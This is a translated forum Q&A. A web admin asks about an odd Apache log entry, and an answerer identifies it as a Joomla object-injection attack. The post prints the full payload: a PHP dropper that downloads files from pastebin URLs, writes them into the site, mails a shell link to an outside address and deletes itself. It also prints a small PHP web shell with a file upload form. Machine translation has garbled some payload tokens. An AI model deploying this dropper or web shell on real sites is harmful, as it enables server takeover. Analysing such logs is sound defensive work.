我最近一直致力于防止在我的生产Apache/PHP/MySQL Web应用程序中注入SQL。
为此,我经常浏览 Apache 访问日志以查找异常请求,如果我发现它们很奇怪,偶尔会尝试复制它们(有人有更好的建议吗?
今天,我看到访问日志中出现了一个奇怪的日志。我看到存在 HTTP 引用器,但我没有原始请求的匹配日志。Apache错误日志中也没有匹配的日志,暗示它"被服务器配置拒绝"。
这是奇怪的日志(base_64解码):
169.239.180.100 - - [22/Mar/2017:04:01:37 +0000] "GET/HTTP/1.1" 200 13963 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0\0disconnectHandlers\";答:1:{i:0;答:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3462:\"$check = $_SERVER['DOCUMENT_ROOT'] ."/libraries/lol.php" ; $fp=fopen("$check","w+"); fwrite($fp,base64_decode('
<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
$toz = "daniel.3.walker@gmail.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Saico <daniel.3.walker@gmail.com>' . "rn";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "rn" . php_uname() . "rn";
$sentmail = @mail($toz, $subject, $message, $header);
@unlink(__FILE__);
?>
')); 关闭($fp); JFactory::getConfig();退出\";s:19:\"cache_name_function\";s:6:\"断言\";s:5:\"cache\";乙:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\0\0\0连接\";b:1;}\xf0\xfd\xfd\xfd">
我试图通过Postman复制这个GET请求,但它被视为"无效的XMLHTTPRequest"。我不确定通常如何测试这一点?
我也不确定这有什么作用(或试图做什么)。任何关于这试图做什么(以及它是否成功)的信息/理论将不胜感激。
我理论上这只是通过HTTP引用器将SQL注入某个"框架"的简单尝试,但我不是专家。提前感谢任何帮助。
这是我解码时得到的
<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
看起来您正在使用Joomla CMS。库文件夹内有一个文件,哈哈.php脚本正在调用该文件。另一个文件/libraries/joomla/wl.php 也是正在调用的恶意文件。此外,正在执行粘贴代码
<?php
// name of the file is: i (it has no extension)
error_reporting(0);
if(isset($_GET["0"]))
{
echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
echo 'walex';
echo 'uname:'.php_uname()."n";
echo getcwd() . "n";
?>
它正在将 pastebin 代码写入您的文件/libraries/joomla/jmail.php。
结论:
如果您不使用Joomla CMS,则无需担心。 如果是,则需要检查那些受影响的文件。可能的恶意文件将上传到您的服务器。